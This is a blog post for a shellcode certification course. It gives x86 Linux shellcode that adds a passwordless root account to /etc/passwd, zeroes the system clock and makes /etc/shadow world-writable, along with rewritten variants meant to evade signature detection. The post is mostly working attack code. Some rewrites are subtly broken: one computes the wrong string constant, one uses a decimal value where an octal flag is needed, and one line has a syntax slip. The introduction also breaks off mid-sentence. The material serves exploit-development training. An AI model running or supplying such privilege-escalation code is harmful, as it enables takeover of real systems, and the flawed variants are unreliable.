SLAE Assignment 6: Creating polymorphic versions of existing Shellcode

06 May 2013

This is the sixth and for me final SLAE assignment before I will hand in everything (and hopefully get certified). The assignment consisted of generating polymorphic versions of shellcode found on shell-storm.org. I took three examples, the first adds a root account to /etc/passwd, the second

Information

Github Repository: https://github.com/cloud101/SLAE32/ This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-251

r00t

The assembly code: My first shellcode is used to add a root user without password.

; By Kris Katterjohn 11/14/2006
; 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd for Linux/x86
  section .text
       global _start
  _start:
  ; open("/etc//passwd", O_WRONLY | O_APPEND)
       push byte 5
       pop eax
       xor ecx, ecx
       push ecx
       push 0x64777373
       push 0x61702f2f
       push 0x6374652f
       mov ebx, esp
       mov cx, 02001Q
       int 0x80
       mov ebx, eax
  ; write(ebx, "r00t::0:0:::", 12)
       push byte 4
       pop eax
       xor edx, edx
       push edx
       push 0x3a3a3a30
       push 0x3a303a3a
       push 0x74303072
       mov ecx, esp
       push byte 12
       pop edx
       int 0x80
  ; close(ebx)
       push byte 6
       pop eax
       int 0x80
  ; exit()
       push byte 1
       pop eax
       int 0x80

My version:

; By Lucas Kauffman
; 100 byte shellcode to add root user 'r00t' with no password to /etc/passwd for Linux/x86
;
; Original by Kris Katterjohn 11/14/2006
  section .text
       global _start
  _start:
  ; open("/etc//passwd", O_WRONLY | O_APPEND)
       xor ebx,ebx                  ; changed the way eax, edx, ebx is nulled
       mul ebx
       mov al,5
       mov ecx,ebx
       push ecx
       mov dword [esp-4], 0x64777373 ; per the video
       mov dword [esp-8], 0x61702f2f
       mov dword [esp-12],0x6374652f
       sub esp,12
       mov ebx, esp
       mov cx, 401
       int 0x80
       mov ebx, eax
  ; write(ebx, "r00t::0:0:::", 12)
       mov al,4
       push edx
       mov esi, 0x20202020 ; per the video
       add esi, 0x11111111
       push esi
       mov esi, 0x20202020
       add esi, 0x11111111
       push esi
       mov esi, 0x63202061
       add esi, 0x11101011
       push esi
       mov ecx, esp
       push byte 12
       pop edx
       int 0x80
  ; close(ebx)
       mov al,6 ; changed push to lower register
       int 0x80
  ; exit()
       mov al,1 ; changed push to lower register
       int 0x80

My code is 100 bytes versus the original 69 bytes. This is an increase of 44%.

Time

This shellcode sets the system time to 0 and is 12 bytes long. I changed my version minimally, but did not achieve making it any shorter, just changing the bytes:

; By Kris Katterjohn 11/18/2006
;  12 byte shellcode to set system time to 0 and exit. No real damage :)
;  exit() code is the last 5 bytes (0x6a - 0x80)
;  for Linux/x86
  section .text
       global _start
  _start:
  ; stime([0])
       push byte 25
       pop eax
       cdq
       push edx
       mov ebx, esp
       int 0x80
  ; exit()
       inc eax
       int 0x80
  section .text
       global _start
  _start:
  ; stime([0])
       mov al,25 ; changed push pop to mov
       cdq
       push edx
       mov ebx, esp
       int 0x80
  ; exit()
       inc al  changed push pop to mov
       int 0x80

It's a bit lame I know ;)

Chmod of /etc/shadow

Last but not least a shellcode which changes the file permissions of /etc/shadow

; By Kris Katterjohn 8/29/2006
;  36 byte shellcode to chmod("/etc/shadow", 0666) and exit for Linux/x86
;  To remove exit(): Remove the last 5 bytes (0x6a - 0x80)
  section .text
       global _start
  _start:
       xor edx, edx
       push byte 15
       pop eax
       push edx
       push byte 0x77
       push word 0x6f64
       push 0x6168732f
       push 0x6374652f
       mov ebx, esp
       push word 0666Q
       pop ecx
       int 0x80
       push byte 1
       pop eax
       int 0x80

Polymorphic version which is 5 bytes longer:

  section .text
       global _start
  _start:
       xor ecx, ecx
       mov al,15   ; changed push pop to mov
       push ecx
       push byte 0x77
       mov cx,0x4d42 ; random addition before pushing
       add cx,0x2222
       push cx
       push 0x6168732f
       push 0x6374652f
       mov ebx, esp
       push word 0x1b6
       pop ecx
       int 0x80
       mov al,1  ; changed push pop to mov
       int 0x80

For this one I also made an additional version which is just 1 byte shorter than the original:

  section .text
       global _start
  _start:
       xor edx, edx
       mov al,15  ; changed push pop to mov
       push edx
       push byte 0x77
       push word 0x6f64
       push 0x6168732f
       push 0x6374652f
       mov ebx, esp
       push word 0x1b6 ; changed octal to hex
       pop ecx
       int 0x80
       mov al,1  ; changed push pop to mov
       int 0x80